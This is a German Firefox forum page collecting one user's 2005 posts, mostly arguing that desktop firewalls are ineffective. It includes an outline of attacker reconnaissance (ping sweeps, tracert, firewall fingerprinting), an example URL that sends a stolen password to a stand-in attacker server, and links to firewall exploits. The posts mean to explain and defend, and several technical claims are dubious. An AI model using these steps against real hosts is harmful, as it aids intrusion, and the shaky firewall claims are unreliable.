1. Nachrichten
  2. Forum
    1. Unerledigte Themen
    2. Forenregeln
  3. Spenden
  • Anmelden
  • Registrieren
  • Suche
Alles
  • Alles
  • Artikel
  • Seiten
  • Forum
  • Erweiterte Suche
  1. camp-firefox.de
  2. Raik

Beiträge von Raik

  • Request: Javascriptconsole unten im browserfenster angedockt

    • Raik
    • 13. März 2005 um 16:11

    hi!

    meine erste extension ist fertig, dabei hab ich aber nichts mit xul zu tun gehabt.
    wer kennt sich damit so gut aus, dass er eine extension schreiben kann, die die javascriptconsole an das browserfenster andockt, so dass ich wärend der arbeit an extensions sofort neue meldungen sehe und nicht erst, wenn ich die console wieder in den vordergrund geholt habe?
    klar kann ich mich damit auch selber beschäftigen, aber wenns jemand anderem leichter fällt ... :wink:

    freundl. grüsse, raik

  • Sinn und Unsinn von "Desktop-Firewalls"

    • Raik
    • 12. März 2005 um 17:05

    thebrain

    ich bin aus deinem posting nicht so ganz schlau geworden. was wolltest du denn eigentlich sagen?

    zu den verlinkten seiten:
    die betrachtungen über den stealth-modus laufen in sofern ins leere, dass damit nicht das verstecken der offenen ports gemeint ist, sondern das unterdrücken des anwortsignals auf einen ping, wie es das tcp/it-protokoll vorschreibt.
    auf dieses, im sogenannten stealth-modus von pfw's unterdrückte signal wird dort aber garnicht eingegangen.

    hier jetzt mal meine anleitung zum nachvollziehen der schritte, die ein "hacker" unternehmen würde:

    Zitat

    start -> ausführen -> "cmd"

    am prompt dann eingeben:

    Zitat

    ping google.de

    die antwort könnte dann so aussehen:

    Zitat

    Ping-Statistik für 216.239.57.104:
    Pakete: Gesendet = 4, Empfangen = 4, Verloren = 0 (0% Verlust),
    Ca. Zeitangaben in Millisek.:
    Minimum = 220ms, Maximum = 370ms, Mittelwert = 307ms


    im durchschnitt hat das antwortsignal auf den ping an google also 307ms gebraucht, um beim versender des ping anzukommen.

    da die ip-bereiche bekannt sind, die den einzelnen providern zur vergabe an ihre kunden (uns :wink: ) zur verfügung stehen, kann jemand also mit einem tool einen ping an ganze gruppen von diesen ip's schicken. ist eine ip gerade nicht vergeben, antwortet lauf tcp/ip-protokoll der zuständige router des providers aud diesen ping mit dem antwortsignal.
    erhält der "hacker" trotz mehrerer versuche keine antwort von einer ip, weis er damit, dass dort ein rechner steht, auf dem irgend eine sortware die protokollgerechte beantwortung des ping unterdrückt.

    will er sichergehen, dass nicht gerade die technik des providers durch einen ausfall dafür verantwortlich ist, gibt er folgendes am prompt ein:

    Zitat

    tracert google.de

    Zitat

    die antwort sieht so aus:
    Routenverfolgung zu google.de [216.239.57.104] über maximal 30 Abschnitte:

    1 60 ms 151 ms 210 ms 217.5.98.178
    2 160 ms 60 ms 161 ms 217.237.157.134
    3 160 ms 201 ms 270 ms f-ea1.F.DE.net.DTAG.DE [62.154.18.22]
    4 130 ms 201 ms 70 ms 62.156.139.130
    5 151 ms 160 ms 70 ms P6-0.AUVCR2.Aubervilliers.opentransit.net [193.251.132.74]
    6 150 ms 200 ms 230 ms P13-0.AUVCR1.Aubervilliers.opentransit.net [193.251.243.217]
    7 180 ms 210 ms 221 ms P14-0.OAKCR1.Oakhill.opentransit.net [193.251.243.170]
    8 270 ms 231 ms 340 ms P8-0.PALCR2.Palo-alto.opentransit.net [193.251.243.213]
    9 361 ms 220 ms 230 ms Google-EU-Customers.GW.opentransit.net [193.251.249.18]
    10 240 ms 361 ms 230 ms 66.249.94.10
    11 381 ms 230 ms 231 ms 216.239.49.170
    12 331 ms 230 ms 220 ms 216.239.49.97
    13 280 ms 220 ms 220 ms 216.239.57.104

    Ablaufverfolgung beendet.

    Alles anzeigen


    damit kann er also erkennen, wo die übertragung endet. mit einem dienst, wie diesem: http://www.zoneedit.com/lookup.html kann er auch den zugehörigen domainnamen erfahren. er kann also feststellen, ob er beim provider gelandet ist, oder bei einem dahinter angeschlossenen kundenrechner.

    der nächste schritt (so er einen rechner gefunden hat, der das antwortsignal unterdrückt) wäre, verschiedene speziell präparierte datenpakete an diese ip zu senden, mit denen man auf bekannte sicherheitslücken der verschiedenen pfw's testen kann. die antworten einiger pfw's auf solche pakete unterscheiden sich auch einfach nur von denen, die das betriebssystem geben würde, woran man sie dann erkennen kann.

    auf diese art erhält der "hacker" die nötigen informationen über die installierte pfw, um sie dann ganz gezielt angreifen zu können.
    wie in dem video vom ccc schön zu sehen ist, kann man die rechner mit norton pfw's z,b, ganz einfach von der nutzung des internet ausschliessen, weil diese pfw auf bestimmte datenpakete hin einfach den vermeindlichen absender blacklistet. und wenn der "hacker" die absendeadresse dieser pakete manipuliert, sperrt die pfw damit statt des "hackers" z.b. den dns-server des providers, womit die namensauflösung der domains in die zugehörige ip nicht mehr geht und der norton-"geschützte" user keine seiten mehr aufrufen kann.


    übrigens ist ja auch jede pfw eine externe sortware :wink: . und sicherheitsbewusstes handelt heist nicht, alles von hand zu machen (zumal das (vertipp-)fehleranfällig ist), sondern sich bewusst zu sein, dass kein noch so sicher konfiguriertes system, keine noch so tolle software jeden blödsinn verhindern kann, den der user anstellt. wer sich halt trojanerverseuchte software auf den rechner läd, dem nützt keine pfw etwas.

    zu der bemerkung auf der zweiten, verlinkten seite, dass das deaktivieren des rpc-dienstes schaden würde:
    konfiguration von diensten heist nicht in jedem fall deaktivieren, sondern den dienst so einzurichten, dass er nur lokal erreichbar ist. für die funktionsfähigkeit der systemwiederherstellung z.b. ist es nicht nötig, dass dieser dienst einen port zum internet offen hält.
    bei mir funktioniert das windows-update übrigens trotz einsatz des scriptes immer noch.

    und weil für die sichere konfiguration des systems sehr viele einstellungen vorgenommen werden müssen, ist es durchaus sinnvoll (sowohl aus zeitgründen, wie auch wegen der fehleranfälligkeit von handeingaben), solche hilfsmittel, wie das script zu benutzen.

  • Sinn und Unsinn von "Desktop-Firewalls"

    • Raik
    • 11. März 2005 um 14:32

    PvW

    Zitat

    mit irgendeiner pfw


    am besten mit zonealarm, die telefoniert selber nachhause :shock: . und dagegen dann noch norton pfw einsetzen, damit man mal in erinnerungen schwelgen kann über die zeiten von 300mhz-prozessoren :lol: .

    Zitat von Lothar Hacker

    Also ich kann es bald nicht mehr lesen.


    warum tust du es dann? :wink:

    Zitat von Lothar Hacker

    Die einen sagen wer eine Desktop-Firewall benutzt hat keine Ahnung,die anderen wieder meinen man braucht sie zum..............usw.


    es gibt leute, die einfach behaupten, dass ihre pfw sie schützt ("zonealarm hat mit schon xxxtausend geblockte angriffe gemeldet *stolz guck*")
    und es gibt leute, die versuchen, zu erklären, wie das alles funktioniert und damit verständlich zu begründen, warum pfw's nicht leisten können, was die hersteller versprechen. (siehe mein erstes posting) wenn es dazu noch fragen gibt, beantworte ich die gern. bisher hat hier allerdings keiner was zu den grundlagen gefragt.
    und es hat auch keiner konkret nach alternativen für die phonehome-software genannt, die er mit einer pfw blocken muss.

    Zitat von Lothar Hacker

    Die Firmen machen Reklame für eine PFW und versprechen einem das alles super ist.


    die firmen machen werbung für alles, auch für jedes noch so unsinnige ding. das ist werbung, keine rechtsverbindliche aussage:
    "mit einem los der norddeutschen klassenlotterie können sie millionen gewinnen."
    ja, wenn das wörtchen "wenn" nicht wär ....
    die firmen verdienen damit ihr geld, jemand, der dagegen argumentiert, verdient damit meistens garnichts (ich auch nicht).
    wem würdest du ehr glauben, dem versicherungsvertreter, oder einem unabhängigen berater, der an dem abschluss nichts verdient?

    Zitat von Lothar Hacker

    So lange sich die sogenannten Firewall-Experten in " Anführungs- Strichen nicht einigen können ...


    den tag wirst du nicht erleben, wo sich "experten" zu einem thema einigen können. dir bleibt nur, dir die verschiedenen standpunkte anzusehen und selber zu entscheiden, was für dich schlüssig klingt. womit wir wieder bei dem punkt sind, welcher "experte" begründet seine ansichten und welcher spuckt nur grosse töne.

    grüsse, raik

  • Webseiten sperren ?

    • Raik
    • 10. März 2005 um 18:40
    Zitat von nixblicker

    Das ganze für XP, Fx 1.0 in deutsch und umsonst - :wink:

    umsonst is nich.
    umsonst war vielleicht dein schulbesuch, aber hier gibts nur kostenlos. :wink:

  • einsteiger-tutorial für erweiterungen / resize textarea

    • Raik
    • 10. März 2005 um 15:51

    Problem gelöst! :D

    jetzt sollte es eigentlich überall gehen (*hoff*).

    Resizeable Textarea 0.1a

  • einsteiger-tutorial für erweiterungen / resize textarea

    • Raik
    • 10. März 2005 um 02:04

    ja, der andere link war aus dem announce-forum, weil ich nur da was hochladen konnte.

    mit den beiden angegebenen links bin ich gerade am gucken, was da passiert. scheint mit dem script zusammenzuhängen, was da eingebaut ist und irgendwas mit der textarea anstellt.

    PS: nix javascript, die doctypeangabe ist schuld daran.
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

    mal sehen, was sich da machen lässt.

  • einsteiger-tutorial für erweiterungen / resize textarea

    • Raik
    • 9. März 2005 um 21:22

    so, hab das problem jetzt anders gelöst.

    weil ich keinen eigenen webspace habe, habe ich die extension erst mal bei extensionsmirror hochgeladen:
    Resizeable Textarea 0.1
    http://http://www.extensionsmirror.nl/index.php?show…view=getnewpost
    geändert: http://www.extensionsmirror.nl/index.php?showtopic=2796

  • Sinn und Unsinn von "Desktop-Firewalls"

    • Raik
    • 9. März 2005 um 21:16

    bc
    nein, ich habe keinen router.

    Neuanfang
    ich sprach nicht von gefundenen und beseitigten viren, sondern davon, dass ich seit 2 jahren keinen einzigen virenalarm mehr hatte. das ist ein unterschied.

    nein, ich verdiene nichts an dem script, ich hab persönlich damit auch nichts zu tun. ich bin nur der meinung, dass man ein auto mit einem platten kein stützrad anbauen, sondern das kaputte rad reparieren sollte.
    pfw's sind stützräder für ein kaputtes auto, das script beseitigt hingegen die ursache der angreifbarkeit: die falsche konfiguration der dienste. dann ist das system von aussen wirklich dicht, anstatt nur die lücken zu bewachen.

    du erkennst den unterschied zwischen "port schliessen" und "durch eine software bewachen lassen" (pfw's "schliessen" keine ports)? im ersten fall ist er ZU und da führt 100%ig kein weg mehr rein. im zweiten fall ist es nur eine frage des geschicks des angreifers, diese hürde zu überwinden.

    mit dem regelmässigen updaten hast du recht.

  • Sinn und Unsinn von "Desktop-Firewalls"

    • Raik
    • 9. März 2005 um 20:04

    Neuanfang
    es geht auch nicht nur um phomehome-software beim einsatz dieses scriptes.
    du hast von dem virus w32blaster gehört, der ohne zutun des users aufgrund eines fehlers in einem der falsch konfigurierten dienste auf den rechner kommen konnte?
    von der sorte gibt es inzwischen noch viel mehr neue versionen.
    und da die personal-fire-wall (pfw) AUF das betriebssystem aufsetzt, gleiben diese bugs von aussen weiter angreifbar.

    und wenn dir die geheimhaltung deiner persönlichen daten schon nicht wichtig ist:
    laut CCC hat der download einer 100mb-datei mit eingeschalteter norton personal firewall mehr las doppelt so lange gedauert, wie ohne.
    das heist nicht allein, dass deine downloads länger dauern, was ja auch noch zu verkraften wäre, sondern vor allem, dass dein gesamtes system durch pfw's massiv ausgebremst wird. da wird ganz schnell aus deinem p3000 ein p1800.

    wie gesagt, ich habe keine firewall (nicht mal in nem router) an meinem rechner und mein virenscanner hat sich trotzdem seit 2 jahren nicht ein einziges mal gemeldet. seit 2 jahren ist es keinem einzigen virus gelungen, auf mein system zu gelangen und das nur mit hilfe dieses scripts.

    selbst wenn du weiterhin eine pfw einsetzen willst, kann dir der einsatz dieses scriptes zur nützen.

  • Sinn und Unsinn von "Desktop-Firewalls"

    • Raik
    • 9. März 2005 um 15:55

    adaware, pestpatrol, spybot search & destroy, <zitat="UliBär"> TCPView von Mark Russinovich</zitat>, etc.
    und vielleicht nicht jedes programm, das einem über den weg läuft, aus purer sammelleidenschaft ausprobieren.

    ich habe in meinem kaspersky die erweiterten virensignaturen eingestellt, die auch spyware enthalten, so dass ich selbst auf diese tools verzichten kann.

  • Sinn und Unsinn von "Desktop-Firewalls"

    • Raik
    • 9. März 2005 um 15:35

    bc
    wenn du irgendwo anfangen willst, warum dann nicht z.b. mit dem script von ntsvcfg.de? das wäre zumindest schon mal "ein guter anfang". :wink:

    UliBär
    "mein wissen" bezog sich nicht auf die aktuelle liste von phonehome-software, sondern auf das wissen über technische grundlagen von internetkomunikation, ablaufsteuerung aud betriebssystemebene und konfiguration von diensten.
    die technischen grundlagen von tcp/ip (osi-7 schichten-modell) haben sich nicht verändert, seit dieses protokoll festgelegt wurde,
    die ablaufsteuerung von microsoft-betriebssystemen hat sich seit der einführung von win NT nur noch unwesentlich, seit win2k garnicht mehr verändert und
    die für grundlagen für die konfiguration von diensten bewegt sich der zeitraum in etwa im gleichen rahmen.

    und da ich nicht den ganzen tag damit zubringe, neue software zu testen, sehe ich auch kein problem darin, mal danach zu googlen, wenn ich mich für ein neues programm interessiere.

    im übrigen muss ich hier auch garnicht jeden überzeugen. wer sich die erklärungen auf ntsvcfg.de durchliest und bereit ist, sich das verständnis dazu zu erarbeiten, der nutzt es halt, und wer nicht, der glaubt weiter daran, das ihn seine pfw schützt. :roll:

  • quelltextanzeige und farben

    • Raik
    • 9. März 2005 um 13:39

    nein, so weit richtig. vielleicht probierst du es mal mit einem neu angelegten profil und wenn es da nicht geht, nochmal eine komplette neuinstallation? vorher den profilordner sichern.

    ich hab dir mal den relevanten source besorgt:

    Code
    <PRE id="line1">
      <SPAN class="doctype"><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">  </SPAN>
    
    
    <  <SPAN class="start-tag">html  </SPAN>
      <SPAN class="attribute-name"> xmlns  </SPAN>
    =  <SPAN class="attribute-value">"http://www.w3.org/1999/xhtml"   </SPAN>
      <SPAN class="attribute-name">xml:lang  </SPAN>
    =  <SPAN class="attribute-value">"en"   </SPAN>
      <SPAN class="attribute-name">lang  </SPAN>
    =  <SPAN class="attribute-value">"en"  </SPAN>
    >
    <  <SPAN class="start-tag">head  </SPAN>
    >
    <  <SPAN class="start-tag">title  </SPAN>
    >gemal.dk - Mozilla - Using Mozilla in testing and debugging web sites</  <SPAN class="end-tag">title  </SPAN>
    >
    <  <SPAN class="start-tag">link  </SPAN>
      <SPAN class="attribute-name"> rel  </SPAN>
    =  <SPAN class="attribute-value">"stylesheet"   </SPAN>
      <SPAN class="attribute-name">media  </SPAN>
    =  <SPAN class="attribute-value">"all"   </SPAN>
      <SPAN class="attribute-name">href  </SPAN>
    =  <SPAN class="attribute-value">"../css/style.css"   </SPAN>
      <SPAN class="attribute-name">type  </SPAN>
    =  <SPAN class="attribute-value">"text/css"   </SPAN>
      <SPAN class="attribute-name">/  </SPAN>
    >
    <  <SPAN class="start-tag">link  </SPAN>
      <SPAN class="attribute-name"> rel  </SPAN>
    =  <SPAN class="attribute-value">"stylesheet"   </SPAN>
      <SPAN class="attribute-name">media  </SPAN>
    =  <SPAN class="attribute-value">"print"   </SPAN>
      <SPAN class="attribute-name">href  </SPAN>
    =  <SPAN class="attribute-value">"../css/print.css"   </SPAN>
      <SPAN class="attribute-name">type  </SPAN>
    =  <SPAN class="attribute-value">"text/css"   </SPAN>
      <SPAN class="attribute-name">/  </SPAN>
    >
    <  <SPAN class="start-tag">script  </SPAN>
      <SPAN class="attribute-name"> type  </SPAN>
    =  <SPAN class="attribute-value">"text/javascript"   </SPAN>
      <SPAN class="attribute-name">src  </SPAN>
    =  <SPAN class="attribute-value">"../js/misc.js"  </SPAN>
    ></  <SPAN class="end-tag">script  </SPAN>
    >
    <  <SPAN class="start-tag">script  </SPAN>
      <SPAN class="attribute-name"> type  </SPAN>
    =  <SPAN class="attribute-value">"text/javascript"   </SPAN>
      <SPAN class="attribute-name">src  </SPAN>
    =  <SPAN class="attribute-value">"../js/titles.js"  </SPAN>
    ></  <SPAN class="end-tag">script  </SPAN>
    >
    <  <SPAN class="start-tag">meta  </SPAN>
      <SPAN class="attribute-name"> http-equiv  </SPAN>
    =  <SPAN class="attribute-value">"content-type"   </SPAN>
      <SPAN class="attribute-name">content  </SPAN>
    =  <SPAN class="attribute-value">"text/html; charset=iso-8859-1"   </SPAN>
      <SPAN class="attribute-name">/  </SPAN>
    >
    <  <SPAN class="start-tag">meta  </SPAN>
      <SPAN class="attribute-name"> http-equiv  </SPAN>
    =  <SPAN class="attribute-value">"content-language"   </SPAN>
      <SPAN class="attribute-name">content  </SPAN>
    =  <SPAN class="attribute-value">"en"   </SPAN>
      <SPAN class="attribute-name">/  </SPAN>
    >
    <  <SPAN class="start-tag">meta  </SPAN>
      <SPAN class="attribute-name"> name  </SPAN>
    =  <SPAN class="attribute-value">"description"   </SPAN>
      <SPAN class="attribute-name">content  </SPAN>
    =  <SPAN class="attribute-value">"Using Mozilla in testing and debugging web sites"   </SPAN>
      <SPAN class="attribute-name">/  </SPAN>
    >
    <  <SPAN class="start-tag">meta  </SPAN>
      <SPAN class="attribute-name"> name  </SPAN>
    =  <SPAN class="attribute-value">"keywords"   </SPAN>
      <SPAN class="attribute-name">content  </SPAN>
    =  <SPAN class="attribute-value">"mozilla,bugzilla,card,gemal,henrik,installer,profile,abook,xul,
    download,chrome,localstore,panacea,prefs,secmod,key3,cert7"   </SPAN>
      <SPAN class="attribute-name">/  </SPAN>
    >
    <  <SPAN class="start-tag">meta  </SPAN>
      <SPAN class="attribute-name"> name  </SPAN>
    =  <SPAN class="attribute-value">"copyright"   </SPAN>
      <SPAN class="attribute-name">content  </SPAN>
    =  <SPAN class="attribute-value">"Copyright (c) 1995-2004 Henrik Gemal"   </SPAN>
      <SPAN class="attribute-name">/  </SPAN>
    >
    <  <SPAN class="start-tag">meta  </SPAN>
      <SPAN class="attribute-name"> name  </SPAN>
    =  <SPAN class="attribute-value">"ICBM"   </SPAN>
      <SPAN class="attribute-name">content  </SPAN>
    =  <SPAN class="attribute-value">"55.7102,12.5681"   </SPAN>
      <SPAN class="attribute-name">/  </SPAN>
    >
    </PRE>
    Alles anzeigen

    die dafür zuständige css-datei ist: resource://gre/res/viewsource.css

  • Sinn und Unsinn von "Desktop-Firewalls"

    • Raik
    • 9. März 2005 um 13:28

    http://internettrash.com/users/phonehome/
    und da guckt bitte mal unter R-Z, wer da als letztes aufgelistet ist. :lol::wink:
    und nun erzählt noch mal was über den schutz gegen phonehome-software durch pfw's. *gg*

    Zitat von UliBär

    Dann allerdings ist es schon zu spät


    zu spät? wofür?
    zu spät, wenn du ein wirklich bösartiges programm auf deinem rechner hast?
    dann ist es auch mit einer pfw zu spät.
    oder wenn es ein "harmloses" programm ist, das nur daten über deine surfgewohnheiten sammelt?
    für sowas gibt es z.b. adaware und spybot und solche seiten, wie die oben verlinkte.

    zwischen einer meinung bezüglich pfw's aufgrund des subjektiven schutzgefühls und dem wissen über tcp/ip-komunikation, über die arbeitsweise von software und windows im besonderen auf system-ebene (ablaufsteuerung, systemmessage-queue, system dispatcher, winproc) und über das konfigurieren von diensten besteht schon noch ein unterschied.

    nochmal zum mitschreiben: pfw's sind prizipbedingt nicht in der lage, wirklich gefährliche spyware an irgend etwas zu hindern, bringen aber jede menge neuer angriffsmöglichkeiten mit auf das system.
    schaut euch doch bitte erst mal dazu den fim vom ccc an, bevor ihr weiter darüber diskutiert.

  • Sinn und Unsinn von "Desktop-Firewalls"

    • Raik
    • 8. März 2005 um 23:53
    Zitat von Sebastian

    Könntest du mir vielleicht so eine alternative nennen für die homecall softwares? ;).


    für welche? realplayer/quicktime? -> realalternative/quicktimealternative

    wir können hier gern alternativen zusammentragen, damit alle was davon haben. :wink:

  • Druckdialog automatisch bestätigen

    • Raik
    • 8. März 2005 um 23:48

    nein, die druckvorschau ist xul-basiert.
    danach popt in jedem fall noch der eigentliche druckdialog des betriebssystems auf (zumindest bei windows) und der hat mit xul und dem firefox nix mehr zu tun.
    unter linux wird das wohl ein daemon sein der sich möglicherweise per kommandozeilenparameter steuern lässt. das musst du aber wohl selber recherchieren.

    http://developer.kde.org/documentation/…kdialog/t1.html
    http://dmoz.org/Computers/Soft…hell/Scripting/
    2 minuten googlen :wink:

  • Sinn und Unsinn von "Desktop-Firewalls"

    • Raik
    • 8. März 2005 um 23:36

    sorry, cyberman, aber du redest bullshit.

    du hast mit sicherheit nicht ein einziges mal auf die verlinkte seite gesehen.

    ein mit diesem script behandeltes windows ist mit sicherheit viel sicherer, als eins mit einer pfw drauf. einfach, weil da kein port mehr offen ist. auch keiner, den eine untaugliche software bewachen müsste.

    ich habe ja nicht einfach geschrieben: pfw's sind sch***, sondern: nehmt dieses script, weil das um welten besser ist, als jede pfw und weil es das eigentliche problem LÖST, statt nur rumzuflickschustern.
    wenn die dienste richtig konfiguriert sind, KANN die keiner mehr angreifen, weil sie nicht mehr erreichbar sind.

    du redest die ganze zeit von einem offenen windows, dabei habe ich gerade auf die möglichkeit hingewiesen, es auf die einzig richtige art dicht zu machen.
    ignorierst du das absichtlich?

  • Druckdialog automatisch bestätigen

    • Raik
    • 8. März 2005 um 15:13

    die druckfunktion ist kein teil des firefox, nur die vorschau.
    wenn du da was erreichen willst, musst du dich mit linux beschäftigen.
    ich vermute mal, dass es für linux ähnliche automatisierungssoftware gibt.

  • Sinn und Unsinn von "Desktop-Firewalls"

    • Raik
    • 8. März 2005 um 15:08

    hast du dir das video angesehen?
    hast du etwas auf den dort verlinkten seiten gelesen?

    die zentrale aussage ist, dass mit desktopfirewalls das system nicht sicherer, sondern unsicherer wird, weil sie aufgrund der verrenkungen, die sie anstellen müssen, um aus der falschen position heraus (eine firewall sitzt VOR dem zu schützenden rechner, NICHT DARAUF) einen schutz zu bieten, jede menge neue angriffsmöglichkeiten und lücken bieten.
    das konzept an sich ist falsch.

    selbst für die von dir genannten zwecke gibt es bessere lösungen.

    homecall-software ist z.b. durch (meist sogar bessere) alternativen ersetzbar, oder kann durch einen eintrag ihres update-/statistik-servers in der hosts-datei diszipliniert werden.

    desktop-firewalls bremsen das system aus, bieten keinen verlässlichen schutz, bringen prinzipbedingt neue sicherheitslücken auf das system, etc.
    wenn dir das *möglicherweise* blockieren von homecall-software als grund für eine derartige resourcenverschwendung ausreicht, ok.
    selbst das ist nicht sicher, weil der programmierer der homecall-software vielleicht schon mit dem nächsten update, das du installierst, auch die firewall austrickst.

    warum willst du eine untaugliche software offene ports bewachen lassen, anstatt sie einfach zu schliessen, indem du dein system richtig konfigurierst?

    für religiös halte ich ehr die vergötterung dieser software: "die hat viel geld gekostet und alle computer-"fach(TM)"-zeitschriften empfehlen sie. die MUSS ja was taugen, sonst wäre ich ja dumm, dafür geld ausgegeben zu haben."
    das sagt ehr etwas über die qualität der redakteure dieser zeitschriften aus, als über die qualität der software. :roll:

  • Sinn und Unsinn von "Desktop-Firewalls"

    • Raik
    • 8. März 2005 um 06:35

    vielleicht kann ja einer von den mods das mal oben festpinnen?

    Zitat

    Was soll eine Firewall leisten?

    Glaubt man den Werbeaussagen der Hersteller von ZoneAlarm, Kerio, Norton Personal Firewall usw., dann schützt eine "Firewall" so ziemlich vor allem, was es böses gibt im Internet.
    Da eine Firewall Ports öffnet oder schliesst, kann sie nicht gegen Viren schützen, denn ein Virus ist eine Software und eine Firewall überwacht nicht den Datenstrom.
    Sie kann auch nicht gegen Trojaner, Homecall-Software u.ä. schützen, wenn diese erst mal auf dem Rechner sind. Ein intelligent programmierter Trojaner benutzt z.b. ebenfalls den Port 80, den man nicht sperren kann, will man noch surfen. Oder er lässt den Browser einfach die Adresse des Servers des "Hackers" aufrufen und hängt an diese Adresse die gestohlenen Daten an:
    http://www.boeser.server.com/speichern.php&…lpasswort=mamma
    Auch eine sogenannte "Application-Firewall" hilft da nicht, denn bösartige Programme klinken sich einfach im Arbeitsspeicher in eine "gute" Anwendung ein und lassen ihre Daten von dieser Übertragen oder nennen sich selber "Internet Explorer" und was macht der User, wenn die Firewall ihn fragt, ob der "Internet Explorer" ins Internet darf? Richtig, er klickt auf "Ja". Wenn es das bösartige Programm nicht sogar selber tut. JEDE aktion, die der angemeldete User machen kann, kann prinzipiell auch von einer Software ausgelöst werden, auch auf Buttons klicken und das schneller, als der User überhaupt die Abfrage sieht.

    Eine Firewall, die diesen Namen auch verdient, läuft auf zwei voneinander unabhängigen Rechnern mit verschiedenen Betriebssystemen, auf denen keine andere Software läuft. (Die einzige zetifizierte Firewall läuft auf OpenBSD b.z.w. FreeDOS-32)
    Und sie ist nur sinnvoll als Ergänzung zu einem Sicherheitskonzept in grossen Firmennetzwerken.

    Auch der sogenannte "Stealth-Modus" verschiedener Software-"Firewalls" ist ein Witz und Ärgernis für Profis.
    Wenn an eine IP Daten gesendet werden (z.b. "ping"), gibt laut TCP/IP-Protokoll der davor beim Provider sitzende Router ein "nicht gefunden"-signal zurück, wenn die IP gerade nicht vergeben ist. Ansonsten ist das die Aufgabe des Rechners, der momentan diese IP hat.
    Schweigt der Rechner, weil sein "schlauer" User eine von solchen "Intelligenz-Bolzen" programmierte Software-"Firewall" im "Stealth-Modus" betreibt, verstösst er (1.) gegen das TCP/IP-Protokoll, (2.) wird das laut Protokoll als verlorengegangenes Datenpaket gewertet und die Übertragung wiederholt (= mehr Traffic) und (3.) ist dem potentiellen Angreifer dann klar, das der Depp am anderen Ende ihm mit einem fehlerhaft arbeitenden Stück Software weitere Einbruchsmöglichkeiten bietet. Es sind in "Fachkreisen" für alle Software-"Firewalls" Exploits (Beschreibungen für Angriffe auf Sicherheitslücken durch Softwarefehler dieser Programme) bekannt!

    Anstatt mit einer potentiell selber fehlerhaften Software offene Ports zu sperren, ist es für den Privatanwender viel sinnvoller, diese offenen Ports zu schliessen. Das heist, die unter diesen Ports laufenden Dienste zu beenden oder wenn sie lokal benötigt werden, ihre unsinnige Verbindung zum Internet zu deaktivieren.

    EMPFEHLUNG: NT-Dienste sicher konfigurieren (Windows2000/XP)Diese Seite bietet ein Script an, das zusammen mit einem kleinen Programm von Microsoft (alles dort verlinkt) Euren Rechner automatisch sicher konfigurieren kann.

    Sicherheit beginnt im Kopf!
    Wo der User auf alles klickt, was nicht bei drei auf den Bäumen ist, helfen auch keine Firewalls und Virenscanner.

    Zuerst solltet Ihr mal vom kompilierten Sicherheitsrisiko "Internet Explorer" auf einen richtigen Browser umsteigen und im IE (ganz wichtig!) ActiveX deaktivieren. Später wird dann nur für Seiten, denen Ihr vertraut und nur, wenn es sich garnicht vermeiden lässt, ActiveX aktiviert (zonenmodell), denn ActiveX hat auf dem Rechner, wo es ausgeführt wird grundsätzlich alle Rechte, die auch der User hat. Es verhält sich, wie ein lokales Programm!
    Auch von Outlook/Outlook Express solltet Ihr die Finger lassen. Das ist die grösste Viren-Schleuder, die es gibt. Benutzt ein anderes Mailprogramm.
    Und eins noch: mindestens ein mal pro Woche nach aktuellen Patches von Microsoft schauen und auch installieren! Wer dem automatischen "Windows Update" nicht traut, muss das halt von Hand machen...

    Alles anzeigen

    den beitrag habe ich auseinem anderen board kopiert, wo ich ihn vor ca. 1 jahr geschrieben habe.
    ausserdem kann ich noch das video vom "Chaosseminar: Personal Firewalls" des ChaosComputerClub sehr empfehlen:

    http://ulm.ccc.de/chaos-seminar/…/recording.html

    Ergänzung:

    Zitat

    Die WinXP-Firewall ist zwar schwierig zu konfigurieren, aber wenn man unbedingt so etwas zu brauchen meint, ist die immer noch viel besser , als alle Desktop-Firewalls von Drittanbietern.
    GRUND: diese FW ist direkt in den TCP-Stack des Betriebssystems integriert, d.h., sie sitzt zumindest fast an der richtigen Stelle, da, wo die Datenpakete reinkommen.
    Andere Firewalls setzen auf diesen Teil des Betriebssystems auf , was heist, dass zuerst das Betriebssystem ALLE Datenpakete in Empfang nimmt und dann erst an die Firewall weitergibt. DANN KANN ES ABER SCHON ZU SPÄT SEIN.

    Die mit Abstand bessere Lösung bleibt es weiterhin, die Dienste des Betriebssystems richtig zu konfigurieren , siehe: http://www.ntsvcfg.de

    Exploits für Zonealarm
    Exploits für Outpost
    Exploits für Blackice
    Exploits für Norton/Symantec Firewalls

    Vier Tools, mit denen Ihr Eure Firewall selber testen Könnt:
    Leak Test
    Firehole
    YALTA - Yet Another Leak Test Application
    Leak Test von GRC

    Alles anzeigen
  • zonealarm internetsperre

    • Raik
    • 8. März 2005 um 06:14

    damit ich nicht alles nochmal schreiben muss, guck mal hier: http://firefox.stw.uni-duisburg.de/forum/viewtopi…p=106611#106611

    was ich nicht verstehe: einerseits so nen schrott, wie den IE gegen den firefox eintauschen, andererseits aber desktop*würg*firewalls benutzen, und dann auch noch zonealarm!

Unterstütze uns!

Jährlich (2025)

92,9 %

92,9% (604,17 von 650 EUR)

Jetzt spenden
  1. Kontakt
  2. Datenschutz
  3. Impressum
Community-Software: WoltLab Suite™
Mastodon